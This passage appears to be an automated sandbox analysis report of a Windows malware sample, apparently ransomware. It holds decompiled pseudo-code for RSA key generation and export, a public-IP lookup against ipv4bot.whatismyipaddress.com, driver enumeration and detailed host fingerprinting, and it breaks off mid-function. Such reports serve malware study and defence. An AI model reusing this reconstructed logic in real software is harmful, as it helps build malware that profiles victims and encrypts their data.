                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
                                    • String ID: open
                                    • API String ID: 1803241880-2758837156
                                    • Opcode ID: dd0cbba130fb7e83b4753fdc3b36268d457670b9af8aeeef44f642284472b79e
                                    • Instruction ID: 17346e7ef18a8b9bef543064817a8e13a219e92cc9ee6d0296a6b9157c0ae95b
                                    • Opcode Fuzzy Hash: dd0cbba130fb7e83b4753fdc3b36268d457670b9af8aeeef44f642284472b79e
                                    • Instruction Fuzzy Hash: DC711170A4030AFBEB14EBE0DD59FEE7B74BB44712F104025E601BA2C1DBB8694ADB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 445 f5882b0-f5882d5 CryptAcquireContextW 446 f5883c9-f5883d1 445->446 447 f5882db-f5882dd 445->447 448 f5882e0-f5882ec 447->448 448->448 449 f5882ee-f588305 VirtualAlloc 448->449 450 f58830b-f58830d 449->450 451 f5883d2-f5883f3 CryptReleaseContext VirtualFree 449->451 450->451 452 f588313-f588357 GetModuleHandleA 450->452 453 f588359-f588365 LoadLibraryA 452->453 454 f588367-f588374 GetProcAddress 452->454 453->454 455 f5883ae 453->455 454->455 456 f588376-f58837f 454->456 457 f5883b0-f5883c3 CryptReleaseContext VirtualFree 455->457 456->455 459 f588381-f588385 456->459 457->446 460 f5883a7-f5883ac 459->460 461 f588387-f58838a 459->461 460->457 462 f588391-f5883a5 461->462 462->460 462->462
                                    C-Code - Quality: 66%
                                    			E0F5882B0(intOrPtr __ecx, void* __edx) {
                                    				long* _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				char _v34;
                                    				short _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				char _v48;
                                    				long** _t37;
                                    				void* _t40;
                                    				struct HINSTANCE__* _t45;
                                    				_Unknown_base(*)()* _t46;
                                    				signed int _t54;
                                    				long _t55;
                                    				intOrPtr _t56;
                                    				signed int _t58;
                                    				signed int _t60;
                                    				void* _t63;
                                    				void* _t64;
                                    				void* _t65;
                                    
                                    				_t54 = 0;
                                    				_v12 = __ecx;
                                    				_t37 =  &_v8;
                                    				_t63 = __edx;
                                    				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
                                    				if(_t37 == 0) {
                                    					L15:
                                    					return _t54;
                                    				} else {
                                    					_t58 = 0;
                                    					do {
                                    						_t3 = _t58 + 0x61; // 0x61
                                    						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
                                    						_t58 = _t58 + 1;
                                    					} while (_t58 < 0x1a);
                                    					_t7 = _t63 + 1; // 0x1
                                    					_t55 = _t7;
                                    					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
                                    					_t64 = _t40;
                                    					if(_t64 == 0 || _t63 >= _t55) {
                                    						CryptReleaseContext(_v8, 0);
                                    						VirtualFree(_t64, 0, 0x8000);
                                    						return 0;
                                    					} else {
                                    						_v48 = 0x70797243;
                                    						_v44 = 0x6e654774;
                                    						_v40 = 0x646e6152;
                                    						_v36 = 0x6d6f;
                                    						_v34 = 0;
                                    						_v32 = 0x61766441;
                                    						_v28 = 0x32336970;
                                    						_v24 = 0x6c6c642e;
                                    						_v20 = 0;
                                    						_t45 = GetModuleHandleA( &_v32);
                                    						if(_t45 != 0) {
                                    							L7:
                                    							_t19 =  &_v48; // 0x70797243
                                    							_t46 = GetProcAddress(_t45, _t19);
                                    							if(_t46 == 0) {
                                    								goto L13;
                                    							} else {
                                    								_push(_t64);
                                    								_push(_t63);
                                    								_push(_v8);
                                    								if( *_t46() == 0) {
                                    									goto L13;
                                    								} else {
                                    									_t60 = 0;
                                    									if(_t63 != 0) {
                                    										_t56 = _v12;
                                    										_v16 = 0x1a;
                                    										do {
                                    											asm("cdq");
                                    											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
                                    											_t60 = _t60 + 1;
                                    										} while (_t60 < _t63);
                                    									}
                                    									_t54 = 1;
                                    								}
                                    							}
                                    						} else {
                                    							_t18 =  &_v32; // 0x61766441
                                    							_t45 = LoadLibraryA(_t18);
                                    							if(_t45 == 0) {
                                    								L13:
                                    								_t54 = 0;
                                    							} else {
                                    								goto L7;
                                    							}
                                    						}
                                    						CryptReleaseContext(_v8, 0);
                                    						VirtualFree(_t64, 0, 0x8000); // executed
                                    						goto L15;
                                    					}
                                    				}
                                    			}



























                                    0x0f5882c0
                                    0x0f5882c2
                                    0x0f5882c7
                                    0x0f5882ca
                                    0x0f5882cd
                                    0x0f5882d5
                                    0x0f5883c9
                                    0x0f5883d1
                                    0x0f5882db
                                    0x0f5882db
                                    0x0f5882e0
                                    0x0f5882e0
                                    0x0f5882e3
                                    0x0f5882e8
                                    0x0f5882e9
                                    0x0f5882f5
                                    0x0f5882f5
                                    0x0f5882fb
                                    0x0f588301
                                    0x0f588305
                                    0x0f5883d7
                                    0x0f5883e5
                                    0x0f5883f3
                                    0x0f588313
                                    0x0f588316
                                    0x0f58831e
                                    0x0f588325
                                    0x0f58832c
                                    0x0f588332
                                    0x0f588336
                                    0x0f58833d
                                    0x0f588344
                                    0x0f58834b
                                    0x0f58834f
                                    0x0f588357
                                    0x0f588367
                                    0x0f588367
                                    0x0f58836c
                                    0x0f588374
                                    0x00000000
                                    0x0f588376
                                    0x0f588376
                                    0x0f588377
                                    0x0f588378
                                    0x0f58837f
                                    0x00000000
                                    0x0f588381
                                    0x0f588381
                                    0x0f588385
                                    0x0f588387
                                    0x0f58838a
                                    0x0f588391
                                    0x0f588395
                                    0x0f58839e
                                    0x0f5883a2
                                    0x0f5883a3
                                    0x0f588391
                                    0x0f5883a7
                                    0x0f5883a7
                                    0x0f58837f
                                    0x0f588359
                                    0x0f588359
                                    0x0f58835d
                                    0x0f588365
                                    0x0f5883ae
                                    0x0f5883ae
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f588365
                                    0x0f5883b5
                                    0x0f5883c3
                                    0x00000000
                                    0x0f5883c3
                                    0x0f588305

                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F5882CD
                                    • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000040), ref: 0F5882FB
                                    • GetModuleHandleA.KERNEL32(?), ref: 0F58834F
                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F58835D
                                    • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F58836C
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883B5
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5883C3
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883D7
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5883E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                    • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                    • API String ID: 3996966626-2152921537
                                    • Opcode ID: b4f569f273c729533baaee686f39f774d2f39718d2319693307fb1a54a19ce89
                                    • Instruction ID: f01aefa46416bb242e0ac05bfb1871327c79cb5ce4e052b8b584858dac1be2be
                                    • Opcode Fuzzy Hash: b4f569f273c729533baaee686f39f774d2f39718d2319693307fb1a54a19ce89
                                    • Instruction Fuzzy Hash: 9E314870A00209EBDB109FE4DD85BEEBB78FF04702F544069E601B6280EB389A17DB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 16%
                                    			E0F5863E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                    				long* _v8;
                                    				long* _v12;
                                    				int _v16;
                                    				long** _t15;
                                    				long* _t16;
                                    				long _t23;
                                    
                                    				_t15 =  &_v8;
                                    				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000); // executed
                                    				if(_t15 != 0) {
                                    					L6:
                                    					_t16 = _v8;
                                    					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
                                    					if(_t16 == 0) {
                                    					}
                                    					_v16 = 0;
                                    					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
                                    					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
                                    					CryptDestroyKey(_v12);
                                    					CryptReleaseContext(_v8, 0); // executed
                                    					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
                                    					return 1;
                                    				}
                                    				_t23 = GetLastError();
                                    				if(_t23 != 0x80090016) {
                                    					return 0;
                                    				}
                                    				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                    				if(_t23 != 0) {
                                    					goto L6;
                                    				}
                                    				return 0;
                                    			}









                                    0x0f5863f4
                                    0x0f5863f8
                                    0x0f586400
                                    0x0f586438
                                    0x0f586446
                                    0x0f58644a
                                    0x0f586452
                                    0x0f586452
                                    0x0f586455
                                    0x0f58646e
                                    0x0f586486
                                    0x0f586490
                                    0x0f58649c
                                    0x0f5864b1
                                    0x00000000
                                    0x0f5864b7
                                    0x0f586402
                                    0x0f58640d
                                    0x00000000
                                    0x0f586431
                                    0x0f58641e
                                    0x0f586426
                                    0x00000000
                                    0x0f58642f
                                    0x00000000

                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F584B96,?,0F584B9E), ref: 0F5863F8
                                    • GetLastError.KERNEL32(?,0F584B9E), ref: 0F586402
                                    • CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F584B9E), ref: 0F58641E
                                    • CryptGenKey.ADVAPI32(0F584B9E,0000A400,08000001,?,?,0F584B9E), ref: 0F58644A
                                    • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0F58646E
                                    • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0F586486
                                    • CryptDestroyKey.ADVAPI32(?), ref: 0F586490
                                    • CryptReleaseContext.ADVAPI32(0F584B9E,00000000), ref: 0F58649C
                                    • CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0F5864B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
                                    • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                    • API String ID: 137402220-1948191093
                                    • Opcode ID: 20f1669ca2e543091642e227d390f746c93d75d9fd70526a21cd1632107d1df5
                                    • Instruction ID: 77e3b4d4d798aa6039f0574d410643d6e18703d3481dd7951f0722d0fd54af85
                                    • Opcode Fuzzy Hash: 20f1669ca2e543091642e227d390f746c93d75d9fd70526a21cd1632107d1df5
                                    • Instruction Fuzzy Hash: A9214475780305FBEB20EBA0DE89F9E3B79B748B11F504414F701BB1C0D6B9A915A761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 46%
                                    			E0F582F50(WCHAR* __ecx) {
                                    				unsigned int _v8;
                                    				char _v12;
                                    				WCHAR* _v16;
                                    				short _v2064;
                                    				long _t17;
                                    				void* _t18;
                                    				void* _t20;
                                    				WCHAR* _t23;
                                    				int _t25;
                                    				void* _t28;
                                    				unsigned int _t31;
                                    				void* _t35;
                                    				intOrPtr* _t39;
                                    				signed int _t40;
                                    
                                    				_t39 = __imp__EnumDeviceDrivers;
                                    				_v16 = __ecx;
                                    				_v8 = 0;
                                    				 *_t39( &_v12, 4,  &_v8); // executed
                                    				_t17 = _v8;
                                    				if(_t17 != 0) {
                                    					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
                                    					_t35 = _t18;
                                    					if(_t35 != 0) {
                                    						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
                                    						if(_t20 == 0) {
                                    							L10:
                                    							VirtualFree(_t35, 0, 0x8000); // executed
                                    							return 0;
                                    						} else {
                                    							_t40 = 0;
                                    							_t31 = _v8 >> 2;
                                    							if(_t31 > 0) {
                                    								do {
                                    									_t23 =  &_v2064;
                                    									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
                                    									if(_t23 == 0) {
                                    										goto L9;
                                    									} else {
                                    										_t25 = lstrcmpiW( &_v2064, _v16); // executed
                                    										if(_t25 == 0) {
                                    											VirtualFree(_t35, 0, 0x8000);
                                    											return 1;
                                    										} else {
                                    											goto L9;
                                    										}
                                    									}
                                    									goto L12;
                                    									L9:
                                    									_t40 = _t40 + 1;
                                    								} while (_t40 < _t31);
                                    							}
                                    							goto L10;
                                    						}
                                    					} else {
                                    						return _t18;
                                    					}
                                    				} else {
                                    					return _t17;
                                    				}
                                    				L12:
                                    			}

















                                    0x0f582f5a
                                    0x0f582f69
                                    0x0f582f6d
                                    0x0f582f74
                                    0x0f582f76
                                    0x0f582f7b
                                    0x0f582f8d
                                    0x0f582f93
                                    0x0f582f97
                                    0x0f582fa8
                                    0x0f582fac
                                    0x0f582ff2
                                    0x0f582ffa
                                    0x0f583008
                                    0x0f582fae
                                    0x0f582fb1
                                    0x0f582fb3
                                    0x0f582fb8
                                    0x0f582fc0
                                    0x0f582fc5
                                    0x0f582fcf
                                    0x0f582fd7
                                    0x00000000
                                    0x0f582fd9
                                    0x0f582fe3
                                    0x0f582feb
                                    0x0f583011
                                    0x0f583022
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f582feb
                                    0x00000000
                                    0x0f582fed
                                    0x0f582fed
                                    0x0f582fee
                                    0x0f582fc0
                                    0x00000000
                                    0x0f582fb8
                                    0x0f582f99
                                    0x0f582f9e
                                    0x0f582f9e
                                    0x0f582f81
                                    0x0f582f81
                                    0x0f582f81
                                    0x00000000

                                    APIs
                                    • K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F582F74
                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 0F582F8D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocDeviceDriversEnumVirtual
                                    • String ID: i)w
                                    • API String ID: 4140748134-1280834553
                                    • Opcode ID: a52cbff2c27e979b36c29fba00ac919e2c99f034448eca46c93e16e552cefa8c
                                    • Instruction ID: b5be798d32ed43a2c8bd127696d2c4888455d0adb587606371de88e77df44b43
                                    • Opcode Fuzzy Hash: a52cbff2c27e979b36c29fba00ac919e2c99f034448eca46c93e16e552cefa8c
                                    • Instruction Fuzzy Hash: FB21AA32A04219BBEB109E98AD85FE97BBCFB44711F1041A7FE04F6180DB75A9179B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0F587E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F588024
                                      • Part of subcall function 0F587E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F58803D
                                    • VirtualAlloc.KERNELBASE(00000000,00002801,00003000,00000040,772966A0,?), ref: 0F58700F
                                    • lstrlenW.KERNEL32(0F58FF8C), ref: 0F58701C
                                      • Part of subcall function 0F588050: InternetCloseHandle.WININET(?), ref: 0F588063
                                      • Part of subcall function 0F588050: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F588082
                                    • lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0F58FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F58704B
                                    • wsprintfW.USER32 ref: 0F587063
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0F58FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F587079
                                    • InternetCloseHandle.WININET(?), ref: 0F587087
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
                                    • String ID: GET$ipv4bot.whatismyipaddress.com
                                    • API String ID: 4289327240-2259699238
                                    • Opcode ID: 0c180487e40f81efb48875a502565e08e758f79153bc13230f9dba7b0c1b6f9f
                                    • Instruction ID: 0cc39304379ec535d5ec06b0a30b34a82d2ee5a76a94162813642de8c3bf72e4
                                    • Opcode Fuzzy Hash: 0c180487e40f81efb48875a502565e08e758f79153bc13230f9dba7b0c1b6f9f
                                    • Instruction Fuzzy Hash: F5019235740204BBD6207A75AD4EF9B3F68BB89B62F100035FA05F1181DB68952BD6A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 f587490-f5874a7 1 f5874a9-f5874c8 VirtualAlloc GetUserNameW 0->1 2 f5874ce-f5874d2 0->2 1->2 3 f5874d4-f5874f0 VirtualAlloc GetComputerNameW 2->3 4 f5874f6-f587500 2->4 3->4 5 f587502-f587517 VirtualAlloc 4->5 6 f587556-f58755a 4->6 5->6 7 f587519-f58752f call f587410 5->7 8 f587560-f58759a VirtualAlloc RegOpenKeyExW 6->8 9 f5875f5-f5875f9 6->9 16 f587534-f587536 7->16 13 f58759c-f5875be RegQueryValueExW 8->13 14 f5875de-f5875ef VirtualFree 8->14 10 f5876f9-f5876fd 9->10 11 f5875ff-f58762d VirtualAlloc * 2 9->11 19 f58775b-f58775f 10->19 20 f5876ff-f587728 VirtualAlloc call f587410 10->20 15 f587634-f587667 wsprintfW RegOpenKeyExW 11->15 17 f5875c9 GetLastError 13->17 18 f5875c0-f5875c7 13->18 14->9 22 f587669-f587689 RegQueryValueExW 15->22 23 f5876c4-f5876c6 15->23 24 f587538-f58753f 16->24 25 f587549-f58754e 16->25 28 f5875cf-f5875dc RegCloseKey 17->28 18->28 26 f5877ce-f5877d2 19->26 27 f587761-f587782 GetNativeSystemInfo VirtualAlloc 19->27 31 f58772d-f58772f 20->31 32 f58768b-f587692 22->32 33 f587694 GetLastError 22->33 38 f5876c9-f5876cc 23->38 24->6 34 f587541-f587547 24->34 35 f587551-f587553 wsprintfW 25->35 29 f5877ef-f5877f3 26->29 30 f5877d4-f5877e3 call f587b70 26->30 36 f5877c3 27->36 37 f587784-f58778b 27->37 28->9 28->14 42 f587939 29->42 43 f5877f9-f587887 VirtualAlloc * 2 GetWindowsDirectoryW GetVolumeInformationW call f587410 29->43 52 f5877e8-f5877ea 30->52 31->19 40 f587731-f587758 call f587410 wsprintfW 31->40 41 f58769a-f5876a7 RegCloseKey 32->41 33->41 34->35 35->6 51 f5877c8-f5877cb wsprintfW 36->51 37->36 44 f5877bc-f5877c1 37->44 45 f5877ae-f5877b3 37->45 46 f587792-f5877a1 wsprintfW ExitProcess 37->46 47 f5877b5-f5877ba 37->47 48 f5877a7-f5877ac 37->48 49 f5876ce-f5876d0 38->49 50 f5876d6-f5876f3 wsprintfW VirtualFree 38->50 40->19 41->23 53 f5876a9-f5876b9 41->53 55 f58793f-f587943 42->55 65 f587889-f5878b5 lstrlenW call f587410 43->65 66 f5878ba-f5878fb wsprintfW lstrcatW GetModuleHandleW GetProcAddress 43->66 44->51 45->51 47->51 48->51 49->15 49->50 50->10 51->26 52->29 59 f5877ec 52->59 53->46 71 f5876bf-f5876c2 53->71 57 f587949-f587999 VirtualAlloc 55->57 58 f587af2-f587af9 55->58 67 f5879a0-f5879ab 57->67 62 f587afb-f587b17 VirtualAlloc 58->62 63 f587b40-f587b4b 58->63 59->29 68 f587b19-f587b22 call f586ff0 62->68 69 f587b36 62->69 65->66 73 f587919 66->73 74 f5878fd-f587917 lstrlenW 66->74 67->67 70 f5879ad-f5879bf 67->70 68->63 82 f587b24-f587b30 VirtualFree 68->82 69->63 77 f5879c2-f5879da GetDriveTypeW 70->77 71->38 76 f587920-f587937 VirtualFree 73->76 74->76 76->55 79 f587acd 77->79 80 f5879e0-f5879e3 77->80 84 f587ad3-f587add 79->84 80->79 83 f5879e9-f587a30 lstrcatW * 3 GetDiskFreeSpaceW 80->83 82->69 86 f587ac3-f587acb lstrcatW 83->86 87 f587a36-f587ac1 call f588ab0 * 2 lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 83->87 84->77 85 f587ae3-f587aed lstrlenW 84->85 85->58 86->79 87->84
                                    C-Code - Quality: 88%
                                    			E0F587490(DWORD* __ecx, void* __edx) {
                                    				void* _v8;
                                    				void* _v12;
                                    				long _v16;
                                    				long _v20;
                                    				int _v24;
                                    				int _v28;
                                    				intOrPtr _v32;
                                    				short _v36;
                                    				short _v40;
                                    				WCHAR* _v44;
                                    				WCHAR* _v48;
                                    				WCHAR* _v52;
                                    				WCHAR* _v56;
                                    				WCHAR* _v60;
                                    				WCHAR* _v64;
                                    				WCHAR* _v68;
                                    				signed short _v76;
                                    				char _v132;
                                    				void* _t154;
                                    				long _t155;
                                    				WCHAR* _t157;
                                    				short _t158;
                                    				short _t159;
                                    				short _t160;
                                    				signed int _t161;
                                    				signed int _t164;
                                    				signed int _t166;
                                    				int _t178;
                                    				void* _t181;
                                    				signed int _t183;
                                    				signed int _t186;
                                    				WCHAR* _t190;
                                    				void* _t191;
                                    				void* _t199;
                                    				_Unknown_base(*)()* _t204;
                                    				signed int _t211;
                                    				intOrPtr _t216;
                                    				WCHAR* _t218;
                                    				WCHAR* _t220;
                                    				void* _t221;
                                    				void* _t224;
                                    				WCHAR* _t226;
                                    				long _t229;
                                    				int _t230;
                                    				long _t234;
                                    				void* _t238;
                                    				long _t240;
                                    				long _t243;
                                    				WCHAR* _t246;
                                    				void* _t247;
                                    				WCHAR* _t249;
                                    				WCHAR* _t250;
                                    				WCHAR* _t252;
                                    				void* _t256;
                                    				DWORD* _t260;
                                    				short* _t261;
                                    				DWORD* _t266;
                                    				void* _t267;
                                    				signed int _t270;
                                    				void* _t274;
                                    				void* _t276;
                                    				void* _t277;
                                    				DWORD* _t279;
                                    				void* _t280;
                                    				void* _t281;
                                    
                                    				_t267 = __edx;
                                    				_t260 = __ecx;
                                    				_t279 = __ecx;
                                    				if( *__ecx != 0) {
                                    					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
                                    					_t260 =  &_v24;
                                    					 *(_t279 + 8) = _t252;
                                    					_v24 = 0x100;
                                    					GetUserNameW(_t252, _t260); // executed
                                    				}
                                    				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
                                    					_v24 = 0x1e;
                                    					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
                                    					_t260 =  &_v24;
                                    					 *(_t279 + 0x14) = _t250;
                                    					GetComputerNameW(_t250, _t260);
                                    				}
                                    				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
                                    					L11:
                                    					if( *(_t279 + 0x30) == 0) {
                                    						L18:
                                    						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
                                    							L31:
                                    							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
                                    								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
                                    								_push(_t260);
                                    								 *(_t279 + 0x50) = _t220;
                                    								_t221 = E0F587410(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
                                    								if(_t221 == 0) {
                                    									_push(_t260);
                                    									E0F587410(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
                                    									wsprintfW( *(_t279 + 0x50), L"error");
                                    									_t281 = _t281 + 8;
                                    								}
                                    							}
                                    							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
                                    								L44:
                                    								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
                                    									_v28 = 0;
                                    									_t216 = E0F587B70(_t279 + 0x2c,  &_v28); // executed
                                    									if(_t216 == 0) {
                                    										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
                                    									}
                                    								}
                                    								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
                                    									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    									 *(_t279 + 0x68) = _t190;
                                    									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
                                    									_t276 = _t191;
                                    									GetWindowsDirectoryW(_t276, 0x100);
                                    									_t66 = _t276 + 0x600; // 0x600
                                    									_t266 = _t66;
                                    									 *((short*)(_t276 + 6)) = 0;
                                    									_t68 = _t276 + 0x400; // 0x400
                                    									_t69 = _t276 + 0x604; // 0x604
                                    									_t70 = _t276 + 0x608; // 0x608
                                    									_t71 = _t276 + 0x200; // 0x200
                                    									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
                                    									_push(_t266);
                                    									_t72 = _t276 + 0x60c; // 0x60c
                                    									_t260 = _t72;
                                    									_t199 = E0F587410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
                                    									if(_t199 != 0) {
                                    										_t73 = _t276 + 0x60c; // 0x60c
                                    										_t211 = lstrlenW(_t73);
                                    										_t74 = _t276 + 0x60c; // 0x60c
                                    										_t260 = _t74;
                                    										_push(_t260);
                                    										E0F587410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
                                    									}
                                    									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
                                    									_t79 = _t276 + 0x60c; // 0x60c
                                    									_t281 = _t281 + 0xc;
                                    									lstrcatW( *(_t279 + 0x68), _t79);
                                    									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
                                    									_v28 = _t204;
